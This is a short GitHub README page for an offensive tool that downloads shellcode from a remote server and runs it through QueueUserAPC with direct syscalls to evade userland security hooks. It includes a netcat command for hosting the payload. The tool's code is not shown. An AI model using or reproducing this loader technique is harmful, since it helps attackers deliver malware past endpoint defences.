Skip to content

Latest commit

 

History

History
7 lines (4 loc) · 255 Bytes

File metadata and controls

7 lines (4 loc) · 255 Bytes

0xrob-HostedShellcode-QueueUserAPC-Syscall

This allows you to pull shellcode from a server and execute it via QueueUserAPC with syscalls to bypass userland hooking

shellcode can be hosted easily with something like

nc -vnlp 8080 < /Path/To/Shellcode